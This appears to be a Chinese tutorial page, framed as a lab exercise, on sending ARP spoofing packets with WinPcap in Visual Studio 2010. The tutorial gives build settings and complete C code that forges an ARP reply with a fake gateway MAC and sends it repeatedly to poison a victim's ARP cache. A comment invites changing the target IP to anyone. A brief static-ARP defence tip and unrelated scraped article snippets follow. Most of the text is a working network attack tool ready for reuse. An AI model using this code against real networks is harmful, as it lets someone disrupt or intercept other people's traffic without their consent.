发送arp欺骗报文(Microsoft Visual Studio 2010)

由于局域网的网络流通不是根据IP地址进行,而是根据MAC地址进行传输。所以,MAC地址在A上被伪造成一个不存在的MAC地址,这样就会导致网络不通,A不能Ping通C!这就是一个简单的ARP欺骗。

在每台安装有TCP/IP协议的电脑里都有一个ARP缓存表,表里的IP地址与MAC地址是一一对应的,在命令提示符下,输入“arp -a”就可以查看ARP缓存表中的内容了

注:用“arp -d”命令可以删除ARP表的内容;用“arp -s”可以手动在ARP表中指定IP地址与MAC地址的对应。

配置及代码如下:

项目-->**属性(alt+F7)
配置属性-->C/C++-->常规-->附加包含目录-->(是把头文件所在的文件路径(Include)添加到附加目录中C:\WpdPack\Include)

项目-->**属性(alt+F7)
配置属性-->链接器-->常规-->附加库目录-->(是把Packet.lib;wpcap.lib所在目录(Lib)添加到附加库目录中C:\WpdPack\Lib)

项目-->**属性(alt+F7)
配置属性-->链接器-->输入-->附加依赖项-->补充“;Packet.lib;wpcap.lib”

项目-->**属性(alt+F7)
配置属性-->C/C++-->预处理器-->预处理器定义-->补充“;HAVE_REMOTE”

// WinpCap Test.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <pcap.h>

int _tmain(int argc, _TCHAR* argv[])
{
    pcap_if_t * allAdapters;//适配器列表
    pcap_if_t * adapter;
    pcap_t    * adapterHandle;//适配器句柄
    u_char      packet[ 1020 ]; //待发送的数据封包
    char errorBuffer[ PCAP_ERRBUF_SIZE ];//错误信息缓冲区

if( pcap_findalldevs_ex( PCAP_SRC_IF_STRING, NULL, &allAdapters, errorBuffer ) == -1 )
    {//检索机器连接的所有网络适配器
        fprintf( stderr, "Error in pcap_findalldevs_ex function: %s\n", errorBuffer );
        return -1;
    }

if( allAdapters == NULL )
    {//不存在任何适配器
        printf( "\nNo adapters found! Make sure WinPcap is installed.\n" );
        return 0;
    }

int crtAdapter = 0;

for( adapter = allAdapters; adapter != NULL; adapter = adapter->next)
    {//遍历输入适配器信息(名称和描述信息)
        printf( "\n%d.%s ", ++crtAdapter, adapter->name );
        printf( "-- %s\n", adapter->description );
    }
    printf( "\n" );

//选择适配器
    int adapterNumber;
    printf( "Enter the adapter number between 1 and %d:", crtAdapter );
    scanf_s( "%d", &adapterNumber );

if( adapterNumber < 1 || adapterNumber > crtAdapter )
    {
        printf( "\nAdapter number out of range.\n" );        
        pcap_freealldevs( allAdapters );// 释放适配器列表
        return -1;
    }

adapter = allAdapters;
    for( crtAdapter = 0; crtAdapter < adapterNumber - 1; crtAdapter++ )
        adapter = adapter->next;

// 打开指定适配器
    adapterHandle = pcap_open( adapter->name, // name of the adapter
                               65536,         // portion of the packet to capture
                                              // 65536 guarantees that the whole
                          // packet will be captured
                               PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode
                               1000,             // read timeout - 1 millisecond
                               NULL,          // authentication on the remote machine
                               errorBuffer    // error buffer
                              );
    if( adapterHandle == NULL )
    {//指定适配器打开失败
        fprintf( stderr, "\nUnable to open the adapter\n", adapter->name );
        // 释放适配器列表
        pcap_freealldevs( allAdapters );
        return -1;
    }

pcap_freealldevs( allAdapters );//释放适配器列表

//创建数据封包
    packet[0] = 0xc8;    packet[1] = 0x9c;    packet[2] = 0xdc;    packet[3] = 0x22;    packet[4] = 0x6c;    packet[5] = 0x58;   // 被骗计算机的mac地址
    packet[6] = 0xc8;   packet[7]  = 0x9c;   packet[8]  = 0xdc;   packet[9]  = 0x22;   packet[10] = 0x62;   packet[11] = 0x0f;   // 自己的mac地址
    packet[12] = 0x08;   packet[13] = 0x06;  // 以太网封装arp协议(不用动)
    packet[14] = 0x00;   packet[15] = 0x01;  // arp第1字段:代表以太网
    packet[16] = 0x08;   packet[17] = 0x00;  // arp第2字段:代表IP协议
    packet[18] = 0x06;  // arp第3字段:代表第二层地址的长度
    packet[19] = 0x04;  // arp第4字段:代表第三层地址的长度
    packet[20] = 0x00;   packet[21] = 0x02;   // arp第5字段:这是一个arp应答报文; 下面的是arp的第6,7,8,9字段
    packet[22] = 0xc8;   packet[23]  = 0x9c;   packet[24]  = 0xdc;   packet[25]  = 0x22;   packet[26] = 0x62;   packet[27] = 0x06; // 假的网关地址,
    packet[28] = 0xac;   packet[29] = 0x1c;        packet[30] = 0x0f;   packet[31] = 0xfe;    // 网关的ip,这里是172.28.15.254(在本实验室不用改)
    packet[32] = 0xc8;   packet[33]  = 0x9c;   packet[34]  = 0xdc;   packet[35]  = 0x22;   packet[36] = 0x6c;   packet[37] = 0x58;  // 被骗计算机的mac地址
    packet[38] = 0xac;   packet[39] = 0x1c;        packet[40] = 0x0f;   packet[41] = 0x13;   // 被骗计算机的IP地址,这里是172.28.15.19  (想骗谁,这里就改成谁的IP)

//发送数据封包
    for(int ssde=0;ssde<100;ssde++)
    {
        pcap_sendpacket( adapterHandle, packet, 42);
        Sleep(1000);
    }

system( "PAUSE" );
    return 0;
}

设置静态物理地址,防止ARP欺骗!

arp –s 网关IP 网关MAC

可以防止arp欺骗!

时间: 2024-10-05 05:26:30

发送arp欺骗报文(Microsoft Visual Studio 2010)的相关文章

获取设备列表(Microsoft Visual Studio 2010)

通常,编写基于WinPcap应用程序的第一件事情,就是获得已连接的网络适配器列表.libpcap和WinPcap都提供了 pcap_findalldevs_ex() 函数来实现这个功能: 这个函数返回一个 pcap_if 结构的链表, 每个这样的结构都包含了一个适配器的详细信息.值得注意的是,数据域 name 和 description 表示一个适配器名称和一个可以让人们理解的描述. 我们使用Microsoft Visual Studio 2010编译工具编译程序,中WinPcap文档中模块下找

Microsoft Visual Studio 2010修改项目名称

Microsoft Visual Studio 2010怎么修改项目名称呢? 1.项目右键选择重命名,改为自己想改的名字 2.右键信息选择清理,并重新生成 3.项目右键选择属性 修改程序集名称,默认空间名称,点击程序集信息修改程序信息. 4.关闭程序后修改解决方案所在文件夹的名称 5.修改项目所在文件夹的文件夹名称 6.修改解决方案名称,用记事本打开解决方案修改文本内容 恩,完成了

获取设备列表(Microsoft Visual Studio 2010)含界面设计

同上次获取设备列表(Microsoft Visual Studio 2010)类似,新建项目->MFC...->选基于对话框->完成           类视图点开项目双击CaaaDlg 点击 CaaaDlg::OnInitDialog将上次的代码复制至TODO处,然后像上次配置路径: 对编译器做如下设置: 项目-->**属性(alt+F7)配置属性-->C/C++-->常规-->附加包含目录-->(是把头文件所在的文件路径添加到附加目录中) 项目-->

Microsoft Visual Studio 2010中文版编译SQLlite3.7.0版

作为一名教师,没有具体项目的开发,却喜欢尝鲜,不经意间开始追星了. 换了Win7,安装了Microsoft Visual Studio 2010中文版,7月22日SQLite发布了3.7.0版.当然想试试了. 一.获取源代码下载:http://www.sqlite.org/sqlite-amalgamation-3_7_0.zip 解压(自己任意指定)到你想放置它的目录里(我是放在了D:\SourceCode\sqlite_source\amalgamation) 二.建立项目在vs2010中新

【C++】笔记一:Microsoft Visual Studio 2010软件的安装与建立第一个cpp文件

笔记一:Microsoft Visual Studio 2010软件的安装与建立第一个cpp文件 我学习C++使用软件为Microsoft Visual Studio 2010. 首先,软件的安装包 链接:https://pan.baidu.com/s/1kW3ChL1 密码:lg9p 下载软件并安装不多说. 新建项目 第一步,打开Microsoft Visual Studio 2010 第二步,依次选择[文件]--[新建]--[项目] 第三步,选择[Visual C++]-- [Win32控制

串口通信IN C++(适用于Microsoft Visual Studio 2010/2012/2013 ,VC++6.0 )

                 向无数拼命工作的 程序猿 及 攻城狮 致敬! 软硬件平台简介 CPU:P4 2G及以上兼容于80x86架构的中央处理器 内存:1G及以上 硬盘:80G及以上 网卡:100M及以上 操作系统:Windows XP及以上 软件:VS2010/2012/2013  Visual C++ 6.0  Keil uVision3-4   STC_ISP_V488/友善串口助手 硬件:众多.不胜数 2.总体设计思想 串口通讯把数据的字节分解成单个的二进制比特流依次传输,其

无法安装 Microsoft Visual Studio 2010 Service Pack 1

解决办法: 32 位系统删除:HKEY_LOCAL_MACHINE\Software\Microsoft\VSTO Designtime Setup\ 64 位系统删除:HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\VSTO Designtime Setup\ 转载:http://blog.csdn.net/davidhsing/article/details/8762621

分析数据包(Microsoft Visual Studio 2010)

// Fenxi1.cpp : 定义控制台应用程序的入口点.//代码如下:#include "stdafx.h"#include "pcap.h"#include "bittypes.h"#pragma comment(lib,"ws2_32.lib")typedef struct ip_address{    u_char byte1;    u_char byte2;    u_char byte3;    u_char

Microsoft Visual Studio 2010 VSTS单元测试指南

1.工具安装  2.创建一个类   3.点击新建项目,这里我们建一个C#的类库  4.点击确定后,进入代码编辑界面,这其实就是一个类,可以写下书中代码 . 5.将鼠标定位到User类的构造方法中,然后点右键,弹出下图菜单,单击创建单元测试 6.在弹出的对话框中选择要测试的函数单击确定 7.输入新项目的名称,单击创建 8.这时在左侧或右侧的解决方案资源管理器中就会发现有一个新建项目 9.自动创建的语句一般是无法实现自动测试的,必须修改其中的一些内容,一般主要方法是初始化输入.创建实例.验证结果,具